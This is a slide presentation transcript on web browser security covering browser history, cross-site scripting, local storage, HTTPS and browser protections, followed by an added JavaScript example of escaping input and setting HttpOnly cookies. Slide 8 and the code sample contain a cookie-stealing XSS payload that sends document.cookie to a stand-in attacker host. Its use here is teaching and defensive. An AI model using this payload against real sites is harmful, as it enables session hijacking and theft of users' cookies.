
Web Browser Security

Web Browser Security, by Robert Sellers and Brian Bauer. Relevance: use Internet daily; transmit personal information, needs to be secure. Content: history; security issues and mitigation; protection. Introduction. First ever browser – WorldWideWeb (1990), created at CERN by Tim Berners-Lee


Presentation Transcript


  1. Web Browser Security, by Robert Sellers and Brian Bauer

  2. Introduction
     • Relevance
       • Use Internet daily
       • Transmit personal information, needs to be secure
     • Content
       • History
       • Security Issues and Mitigation
       • Protection

  3. History
     • First ever browser – WorldWideWeb (1990)
       • Created at CERN by Tim Berners-Lee
       • Used internally, no real security threats
       • Would only display HTML text
       • Allowed downloading of other file types

  4. History
     • Mosaic (1993)
       • First browser with a GUI
       • Led to increase in Internet popularity
     • Netscape Navigator (1994)
       • Nearly disappeared by 2000
     • Internet Explorer (1995)
       • Held as much as 95% of the market

  5. History
     • Safari (2003)
       • Apple's browser
     • Firefox (2004)
       • Open source
     • Chrome (2008)
       • Rapid increase in market share

  6. Security Issues
     • Increase in security issues
       • Complexity of web sites and browsers
       • Size of the Internet
         • Anyone can access
       • Uses of Internet
         • Online banking
         • Shopping
       • More sharing of sensitive data

  7. Security Issues
     • Cross Site Scripting (XSS)
       • Takes advantage of complex, dynamic web pages
       • Injects client side scripts, HTML
       • Can lead to cookie theft, browser redirection, untrusted content
       • Nearly 80% of vulnerabilities in 2007 (Symantec)

  8. Security Issues
     • Example
       http://portal.example/index.php?sessionid=12312312&username=<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script>
       • source: http://projects.webappsec.org/w/page/13246920/Cross-Site-Scripting
     • XSS Mitigation
       • Disable scripting
       • Sanitize input, escape HTML/scripts
       • No script access to cookies

  9. Security Issues
     • Local Storage
       • Form data
       • Login credentials
     • Encryption - HTTP vs HTTPS
       • Packet sniffing -> session hijacking, password stealing

  10. Protecting Yourself Online
     • Incognito Mode (Google Chrome)
       • Allows user to switch between multiple privacy settings with the click of a button
       • Can be activated in one window/tab but not others
     • Browser Guards
       • Modern browsers will prevent users from visiting malicious sites
       • Two main methods
         • List of reported malicious sites
         • Algorithm to detect malicious code on a site
       • This can protect from viruses, phishing, and other threats

  11. Conclusion
     • Browsers can only do so much
     • Much security is responsibility of web designers
     • Internet users should be aware of issues
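
The two server-side mitigations from slide 8 (escape reflected input, no script access to cookies), as an added example that is not part of the original presentation. The function names renderGreeting and sessionCookieHeader are hypothetical stand-ins for the portal's code, the sample request is constructed from the slide's URL, and the Secure and SameSite attributes go beyond what the slide lists.

```javascript
// Added example (not from the slides): escape reflected input and keep the
// session cookie out of reach of page scripts.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escaping for HTML element content and quoted attribute values only; other
// contexts (inline script, URLs, CSS) need their own encoders.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical stand-in for index.php: reflects ?username= into the page.
function renderGreeting(requestUrl, { escape }) {
  const username = new URL(requestUrl).searchParams.get("username") ?? "";
  return `<p>Welcome, ${escape ? escapeHtml(username) : username}</p>`;
}

// Set-Cookie value for the session: HttpOnly removes the cookie from
// document.cookie, Secure keeps it off plain HTTP (the sniffing risk on slide 9).
function sessionCookieHeader(sessionId) {
  return `sessionid=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Constructed sample: the slide 8 request, with the username value URL-encoded.
const SLIDE_PAYLOAD =
  "<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'" +
  "+document.cookie</script>";
const SAMPLE_URL =
  "http://portal.example/index.php?sessionid=12312312&username=" +
  encodeURIComponent(SLIDE_PAYLOAD);

console.log("unescaped: ", renderGreeting(SAMPLE_URL, { escape: false }));
console.log("escaped:   ", renderGreeting(SAMPLE_URL, { escape: true }));
console.log("Set-Cookie:", sessionCookieHeader("12312312"));
```

With escaping on, the browser displays the script tag as text instead of running it, and with HttpOnly set, a script that does run cannot read the session cookie.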
